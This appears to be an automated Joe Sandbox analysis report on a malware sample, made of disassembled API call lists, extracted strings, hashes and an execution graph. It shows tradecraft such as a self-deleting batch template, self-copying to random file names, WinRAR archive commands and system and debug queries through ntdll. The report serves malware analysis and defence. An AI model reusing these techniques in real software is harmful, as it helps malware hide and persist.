                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                    • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                    • API String ID: 2203340711-1636733187
                                    • Opcode ID: 7b3958c8cdb82c8710fb5b141260eba58d46ccc4730eea4b9a547e71711a513b
                                    • Instruction ID: 9c17dbd1d1ad8d5fda22fb0cbf80fae34879a98c7100650b474d4b05e1cd222e
                                    • Opcode Fuzzy Hash: 7b3958c8cdb82c8710fb5b141260eba58d46ccc4730eea4b9a547e71711a513b
                                    • Instruction Fuzzy Hash: 9681AFB1504344ABD7129F60DC49FABB7ACFB89746F00091AFA45D31B0D7709A898BA6
                                    APIs
                                    • memset.MSVCRT ref: 00352766
                                    • memset.MSVCRT ref: 00352774
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00352787
                                    • wsprintfA.USER32 ref: 003527AB
                                      • Part of subcall function 0035185B: GetSystemTimeAsFileTime.KERNEL32(00351F92,00000000,?,00000000,?,?,?,00351F92,?,00000000,00000002), ref: 00351867
                                      • Part of subcall function 0035185B: srand.MSVCRT ref: 00351878
                                      • Part of subcall function 0035185B: rand.MSVCRT ref: 00351880
                                      • Part of subcall function 0035185B: srand.MSVCRT ref: 00351890
                                      • Part of subcall function 0035185B: rand.MSVCRT ref: 00351894
                                    • wsprintfA.USER32 ref: 003527C6
                                    • CopyFileA.KERNEL32(?,00354C80,00000000), ref: 003527D4
                                    • wsprintfA.USER32 ref: 003527F4
                                      • Part of subcall function 00351973: PathFileExistsA.SHLWAPI(\N5`N5,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00351992
                                      • Part of subcall function 00351973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003519BA
                                      • Part of subcall function 00351973: Sleep.KERNEL32(00000064), ref: 003519C6
                                      • Part of subcall function 00351973: wsprintfA.USER32 ref: 003519EC
                                      • Part of subcall function 00351973: CopyFileA.KERNEL32(?,?,00000000), ref: 00351A00
                                      • Part of subcall function 00351973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00351A1E
                                      • Part of subcall function 00351973: GetFileSize.KERNEL32(?,00000000), ref: 00351A2C
                                      • Part of subcall function 00351973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00351A46
                                      • Part of subcall function 00351973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00351A65
                                    • DeleteFileA.KERNEL32(?,?,00354E54,00354E58), ref: 0035281A
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00354E54,00354E58), ref: 00352832
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                    • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                    • API String ID: 692489704-3642343254
                                    • Opcode ID: 3d27b47970bb0a4437d36e17fbcde3050c9bb3e6ea1271c5237444d65557697e
                                    • Instruction ID: 9da3e5010f4b2e3806adfe4b02760d48ff130cc0f3fb7ad6c3f77bfc6b886bd6
                                    • Opcode Fuzzy Hash: 3d27b47970bb0a4437d36e17fbcde3050c9bb3e6ea1271c5237444d65557697e
                                    • Instruction Fuzzy Hash: 102145B694031C7BDB12E7A4DC89FDB776CEB0574AF4005A1FA45E3061E6709F8C8AA0
                                    APIs
                                      • Part of subcall function 0035185B: GetSystemTimeAsFileTime.KERNEL32(00351F92,00000000,?,00000000,?,?,?,00351F92,?,00000000,00000002), ref: 00351867
                                      • Part of subcall function 0035185B: srand.MSVCRT ref: 00351878
                                      • Part of subcall function 0035185B: rand.MSVCRT ref: 00351880
                                      • Part of subcall function 0035185B: srand.MSVCRT ref: 00351890
                                      • Part of subcall function 0035185B: rand.MSVCRT ref: 00351894
                                    • wsprintfA.USER32 ref: 003515AA
                                    • wsprintfA.USER32 ref: 003515C6
                                    • lstrlen.KERNEL32(?), ref: 003515D2
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 003515EE
                                    • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00351609
                                    • CloseHandle.KERNEL32(00000000), ref: 00351612
                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0035162D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                    • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$open
                                    • API String ID: 617340118-3616273218
                                    • Opcode ID: 324c4e80a0821b846215cf831ee1a9bc2695e6b804dd899805ffdf1ccf911613
                                    • Instruction ID: 4dc803e43c91ae2315fd50d6d371afc2e1dab95f9508715ff949e728894201ab
                                    • Opcode Fuzzy Hash: 324c4e80a0821b846215cf831ee1a9bc2695e6b804dd899805ffdf1ccf911613
                                    • Instruction Fuzzy Hash: C61137769012287BD72297A5DC89EEB7B6CDF59796F000051FD49E3061DA709B888BB0
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00351400), ref: 00351226
                                    • GetProcAddress.KERNEL32(00000000), ref: 0035122D
                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00351400), ref: 0035123F
                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00351400), ref: 00351250
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00351400), ref: 0035129E
                                    • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00351400), ref: 003512B0
                                    • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00351400), ref: 003512F5
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00351400), ref: 0035130A
                                    Strings
                                    • ZwQuerySystemInformation, xrefs: 00351212
                                    • ntdll.dll, xrefs: 00351219
                                    • C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00351262
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                    • String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$ZwQuerySystemInformation$ntdll.dll
                                    • API String ID: 1500695312-4221281799
                                    • Opcode ID: b30d4a5ceefa37345c240ae15f773fceab49e076d8ff9f2b770cba0011ba7575
                                    • Instruction ID: 50b063583ad5fa1aad44b4e6067b6e120095e324ef755ab6be14562b28c31824
                                    • Opcode Fuzzy Hash: b30d4a5ceefa37345c240ae15f773fceab49e076d8ff9f2b770cba0011ba7575
                                    • Instruction Fuzzy Hash: B321F231645311ABD7239B65CC08F6BBAACFB85B82F010D18FA46D72A0C770DA48C7A5
                                    APIs
                                    • memset.MSVCRT ref: 003518B1
                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75570F00,76C08400), ref: 003518D3
                                    • CloseHandle.KERNEL32(I%5), ref: 003518E9
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003518F0
                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00351901
                                    • CloseHandle.KERNEL32(?), ref: 0035190A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                    • String ID: I%5
                                    • API String ID: 876959470-1045068697
                                    • Opcode ID: c12456423ce512f50dd478df2fb98ee3645615fe734ea257570ce0ed460a0be8
                                    • Instruction ID: 6c42aa841c8e981149fa73f296c38010767c54e54fc6eee5d3d17632fe3d2b68
                                    • Opcode Fuzzy Hash: c12456423ce512f50dd478df2fb98ee3645615fe734ea257570ce0ed460a0be8
                                    • Instruction Fuzzy Hash: F3017176901228BBCB226B95DC48DDFBF7DEF85761F104021F916A61A0D6314A18CAA0
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7556E800,?,?,003529DB,?,00000001), ref: 003526A7
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,7556E800,?,?,003529DB,?,00000001), ref: 003526B5
                                    • lstrlen.KERNEL32(?), ref: 003526C4
                                    • ??2@YAPAXI@Z.MSVCRT ref: 003526CE
                                    • lstrcpy.KERNEL32(00000004,?), ref: 003526E3
                                    • lstrcpy.KERNEL32(?,00000004), ref: 0035271F
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0035272D
                                    • SetEvent.KERNEL32 ref: 0035273C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                    • String ID:
                                    • API String ID: 41106472-0
                                    • Opcode ID: dc4fae2ae27afc94f990bf528f2e5ced8fdf24227e1e1745d0da8ab928fcf258
                                    • Instruction ID: 378559b36b9c719826ebc6694f5a50125643108404340e382316d60860ed23d6
                                    • Opcode Fuzzy Hash: dc4fae2ae27afc94f990bf528f2e5ced8fdf24227e1e1745d0da8ab928fcf258
                                    • Instruction Fuzzy Hash: BC116736500300AFCB279F19EC48C6B7BADFB9A767B114025FC5987171D6708989DB50
                                    APIs
                                    Strings
                                    • .exe, xrefs: 00351C57
                                    • crVtgpviMHzkomTjFCevkEXGbNYRMEPBNYOSVohInyiZgDUpumPwztDaQuLJNjrxRaLkiJQufSGFtfAHceRmgdBKlHwEpOLzSDaqWWPsJljhKbvsxUlreWyIfGwZxOdqdhnFnYQbCTTyUXZqcsoBCMVAKXIA, xrefs: 00351B8A, 00351B9C, 00351C15, 00351C49
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: lstrcatmemcpymemsetrandsrand
                                    • String ID: .exe$crVtgpviMHzkomTjFCevkEXGbNYRMEPBNYOSVohInyiZgDUpumPwztDaQuLJNjrxRaLkiJQufSGFtfAHceRmgdBKlHwEpOLzSDaqWWPsJljhKbvsxUlreWyIfGwZxOdqdhnFnYQbCTTyUXZqcsoBCMVAKXIA
                                    • API String ID: 122620767-727462888
                                    • Opcode ID: eddb88f97d5b412bc15a9d79165f5c80ae1b4be675122c616bc17671080f78d9
                                    • Instruction ID: 6f37bb58d55a4bb8f389fde5dda40838d773b1bf24ee999b69682464d38e4446
                                    • Opcode Fuzzy Hash: eddb88f97d5b412bc15a9d79165f5c80ae1b4be675122c616bc17671080f78d9
                                    • Instruction Fuzzy Hash: D7210A32E443906ED21B133A6C51F6A3A988FA3717F174099FD861B1B3D26409C9C361
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00351334
                                    • GetProcAddress.KERNEL32(00000000), ref: 0035133B
                                    • memset.MSVCRT ref: 00351359
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProcmemset
                                    • String ID: NtSystemDebugControl$ntdll.dll
                                    • API String ID: 3137504439-2438149413
                                    • Opcode ID: 38a0747a789bc3d72e1fd62ba3f359828a12c295b9c048282d909b798fccf4a4
                                    • Instruction ID: 59e2b1131023ef794f7a7d8fb14882a3d5c29ece630b2fb709428a5a70bdb853
                                    • Opcode Fuzzy Hash: 38a0747a789bc3d72e1fd62ba3f359828a12c295b9c048282d909b798fccf4a4
                                    • Instruction Fuzzy Hash: 36016D7560030DAFDB12DFA4AC85EAFBBBCFB41316F00452AFD01A21A0E3708659CA91
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: strrchr$lstrcmpilstrcpylstrlen
                                    • String ID:
                                    • API String ID: 3636361484-0
                                    • Opcode ID: 7170c569d8b37a58bf576b864975600726316c75a835579d88be71af4bfe2629
                                    • Instruction ID: 2c77f39cef65adf56ede276f8d2c56280a2754d8e7efffc2d4c3feaae56a3219
                                    • Opcode Fuzzy Hash: 7170c569d8b37a58bf576b864975600726316c75a835579d88be71af4bfe2629
                                    • Instruction Fuzzy Hash: 0B01D6B29143196FEB235760EC49FD7779CDB04356F050066EE46E30F0EAB49A888BE0
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(00351F92,00000000,?,00000000,?,?,?,00351F92,?,00000000,00000002), ref: 00351867
                                    • srand.MSVCRT ref: 00351878
                                    • rand.MSVCRT ref: 00351880
                                    • srand.MSVCRT ref: 00351890
                                    • rand.MSVCRT ref: 00351894
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Timerandsrand$FileSystem
                                    • String ID:
                                    • API String ID: 4106363736-0
                                    • Opcode ID: 2d03ef7a15545644d7d9df894f7488148bcac7093af4db5f3ac9b7b98d28bb4d
                                    • Instruction ID: 17e3f1ed205abe5e246e90228bccc6272aec5e49bd38d2920f6da22b4c9809d0
                                    • Opcode Fuzzy Hash: 2d03ef7a15545644d7d9df894f7488148bcac7093af4db5f3ac9b7b98d28bb4d
                                    • Instruction Fuzzy Hash: B5E0D877A10318BBD701A7F9EC4689EBBACDE842B2F100527F601D32A0E570FD448AB4
                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0035603C
                                    • GetProcAddress.KERNEL32(00000000,00356064), ref: 0035604F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true
                                    • Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: kernel32.dll
                                    • API String ID: 1646373207-1793498882
                                    • Opcode ID: 788e5fbc9a19684046a95bdb48ef234931b5418e66a274c67c5318035c7d04a5
                                    • Instruction ID: 930c5b6b07dc77c4452a072fa188ef922a311be30a2422acd1a461ca5eb08d8f
                                    • Opcode Fuzzy Hash: 788e5fbc9a19684046a95bdb48ef234931b5418e66a274c67c5318035c7d04a5
                                    • Instruction Fuzzy Hash: F3F0F0F11442898FEF718EA4CC45FEE3BE4EB15711F90052AEE09CB291DB3486098B24

                                    Execution Graph

                                    Execution Coverage:1.6%
                                    Dynamic/Decrypted Code Coverage:3.8%
                                    Signature Coverage:0%
                                    Total number of Nodes:210
                                    Total number of Limit Nodes:34
                                    execution_graph 22440 4de081f GetCurrentHwProfileW 22441 912dd0 22444 912d0e 22441->22444 22443 912de2 22447 912d1a std::locale::_Setgloballocale 22444->22447 22445 912d21 22462 91acaf RtlAllocateHeap __dosmaperr 22445->22462 22447->22445 22449 912d41 22447->22449 22448 912d26 22463 912210 RtlAllocateHeap ___std_exception_copy 22448->22463 22451 912d53 22449->22451 22452 912d46 22449->22452 22458 9240f8 22451->22458 22464 91acaf RtlAllocateHeap __dosmaperr 22452->22464 22455 912d5c 22457 912d31 22455->22457 22465 91acaf RtlAllocateHeap __dosmaperr 22455->22465 22457->22443 22459 924104 std::_Lockit::_Lockit std::locale::_Setgloballocale 22458->22459 22466 92419c 22459->22466 22461 92411f 22461->22455 22462->22448 22463->22457 22464->22457 22465->22457 22467 9241bf 22466->22467 22471 924205 22467->22471 22472 923e63 22467->22472 22469 924220 22476 924823 RtlAllocateHeap __dosmaperr 22469->22476 22471->22461 22475 923e70 __dosmaperr std::_Facet_Register 22472->22475 22473 923e9b RtlAllocateHeap 22474 923eae __dosmaperr 22473->22474 22473->22475 22474->22469 22475->22473 22475->22474 22476->22471 22722 838b00 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 22728 832540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::locale::_Locimp::_Locimp 22723 84a100 7 API calls 3 library calls 22634 916658 22635 91666b ___std_exception_copy 22634->22635 22640 916533 22635->22640 22637 916677 22647 911f4c RtlAllocateHeap ___std_exception_copy 22637->22647 22639 916683 22641 91653f std::locale::_Setgloballocale 22640->22641 22642 916549 22641->22642 22643 91656c 22641->22643 22662 912193 RtlAllocateHeap ___std_exception_copy __Getctype 22642->22662 22645 916564 22643->22645 22648 9165ca 22643->22648 22645->22637 22647->22639 22649 9165d7 22648->22649 22650 9165fa 22648->22650 22674 912193 RtlAllocateHeap ___std_exception_copy __Getctype 22649->22674 22652 913041 4 API calls 22650->22652 22660 9165f2 22650->22660 22653 916612 22652->22653 22663 92485d 22653->22663 22656 9239f2 RtlAllocateHeap 22657 916626 22656->22657 22667 9224af 22657->22667 22660->22645 22662->22645 22664 924874 22663->22664 22666 91661a 22663->22666 22664->22666 22676 924823 RtlAllocateHeap __dosmaperr 22664->22676 22666->22656 22668 9224d8 22667->22668 22673 91662d 22667->22673 22669 922527 22668->22669 22671 9224ff 22668->22671 22681 912193 RtlAllocateHeap ___std_exception_copy __Getctype 22669->22681 22677 92241e 22671->22677 22673->22660 22675 924823 RtlAllocateHeap __dosmaperr 22673->22675 22674->22660 22675->22660 22676->22666 22678 92242a std::locale::_Setgloballocale 22677->22678 22680 922469 22678->22680 22682 922582 22678->22682 22680->22673 22681->22673 22683 92814e RtlAllocateHeap 22682->22683 22686 922592 22683->22686 22684 922598 22694 9280bd RtlAllocateHeap __dosmaperr 22684->22694 22686->22684 22687 9225ca 22686->22687 22688 92814e RtlAllocateHeap 22686->22688 22687->22684 22689 92814e RtlAllocateHeap 22687->22689 22690 9225c1 22688->22690 22691 9225d6 FindCloseChangeNotification 22689->22691 22692 92814e RtlAllocateHeap 22690->22692 22691->22684 22692->22687 22693 9225f0 22693->22680 22694->22693 22720 91abd8 SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 22695 4de07d1 22696 4de0847 GetCurrentHwProfileW 22695->22696 22697 4de07d4 22695->22697 22699 4de0865 22696->22699 22700 4de0831 22697->22700 22701 4de0847 GetCurrentHwProfileW 22700->22701 22702 4de0865 22701->22702 22702->22696 22703 910880 RtlAllocateHeap ___except_validate_context_record _ValidateLocalCookies ___std_exception_copy __IsNonwritableInCurrentImage 22704 844a90 GetSystemTimePreciseAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 22595 898610 22596 898657 22595->22596 22599 898628 std::locale::_Setgloballocale 22595->22599 22600 89ba20 22596->22600 22598 89866a 22601 89bb6c 22600->22601 22602 89ba45 22600->22602 22623 832040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 22601->22623 22605 89bab3 22602->22605 22606 89baa6 22602->22606 22608 89ba5a 22602->22608 22604 89bb71 22624 831fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 22604->22624 22610 90cd02 std::_Facet_Register 2 API calls 22605->22610 22613 89ba6a std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 22605->22613 22606->22604 22606->22608 22615 90cd02 22608->22615 22610->22613 22614 89bb2a std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 22613->22614 22625 912220 RtlAllocateHeap ___std_exception_copy __Getctype 22613->22625 22614->22598 22618 90cd07 std::_Facet_Register 22615->22618 22617 90cd21 22617->22613 22618->22617 22620 831fa0 Concurrency::cancel_current_task 22618->22620 22626 91b99c 22618->22626 22619 90cd2d 22619->22619 22620->22619 22632 90e0c1 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 22620->22632 22622 831fe3 22622->22613 22623->22604 22624->22613 22630 92489d __dosmaperr std::_Facet_Register 22626->22630 22627 9248db 22633 91acaf RtlAllocateHeap __dosmaperr 22627->22633 22628 9248c6 RtlAllocateHeap 22628->22630 22631 9248d9 22628->22631 22630->22627 22630->22628 22631->22618 22632->22622 22633->22631 22434 e07000 22436 e07044 GetPEB 22434->22436 22437 e07077 CreateFileA 22436->22437 22439 e0722d 22437->22439 22477 84db60 WSAStartup 22478 84db98 22477->22478 22481 84dc56 22477->22481 22479 84dc24 socket 22478->22479 22478->22481 22480 84dc3a connect 22479->22480 22479->22481 22480->22481 22482 84dc4c closesocket 22480->22482 22482->22479 22482->22481 22712 84e460 6 API calls 22705 844ab0 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 22483 916ba6 22484 916bb9 ___std_exception_copy 22483->22484 22489 9168fd 22484->22489 22486 916bce 22496 911f4c RtlAllocateHeap ___std_exception_copy 22486->22496 22488 916bdb 22491 916909 std::locale::_Setgloballocale 22489->22491 22490 91690f 22506 912193 RtlAllocateHeap ___std_exception_copy __Getctype 22490->22506 22491->22490 22493 916952 22491->22493 22497 916a80 22493->22497 22495 91692a 22495->22486 22496->22488 22498 916a93 22497->22498 22499 916aa6 22497->22499 22498->22495 22507 9169a7 22499->22507 22501 916b57 22501->22495 22503 916ac9 22503->22501 22511 913041 22503->22511 22506->22495 22508 9169b8 22507->22508 22510 916a10 22507->22510 22508->22510 22520 91bbad SetFilePointerEx RtlAllocateHeap ___std_exception_copy 22508->22520 22510->22503 22512 913081 22511->22512 22513 91305a 22511->22513 22517 91bbed 22512->22517 22513->22512 22521 9239f2 22513->22521 22515 913076 22528 922dfb 22515->22528 22572 91bacc 22517->22572 22519 91bc06 22519->22501 22520->22510 22522 923a13 22521->22522 22523 9239fe 22521->22523 22522->22515 22535 91acaf RtlAllocateHeap __dosmaperr 22523->22535 22525 923a03 22536 912210 RtlAllocateHeap ___std_exception_copy 22525->22536 22527 923a0e 22527->22515 22530 922e07 std::locale::_Setgloballocale 22528->22530 22529 922e0f 22529->22512 22530->22529 22531 922e48 22530->22531 22533 922e8e 22530->22533 22551 912193 RtlAllocateHeap ___std_exception_copy __Getctype 22531->22551 22533->22529 22537 922f0c 22533->22537 22535->22525 22536->22527 22540 922f34 22537->22540 22550 922f57 22537->22550 22538 922f38 22557 912193 RtlAllocateHeap ___std_exception_copy __Getctype 22538->22557 22540->22538 22541 922f93 22540->22541 22542 922fb1 22541->22542 22543 91bbed 2 API calls 22541->22543 22552 922a51 22542->22552 22543->22542 22546 923010 22548 923079 WriteFile 22546->22548 22546->22550 22547 922fc9 22547->22550 22558 922622 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_dtor _ValidateLocalCookies std::locale::_Locimp::_Locimp 22547->22558 22548->22550 22550->22529 22551->22529 22559 92e7b4 22552->22559 22554 922a63 22555 922a91 22554->22555 22568 917780 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_dtor ___std_exception_copy 22554->22568 22555->22546 22555->22547 22557->22550 22558->22550 22560 92e7c1 22559->22560 22561 92e7ce 22559->22561 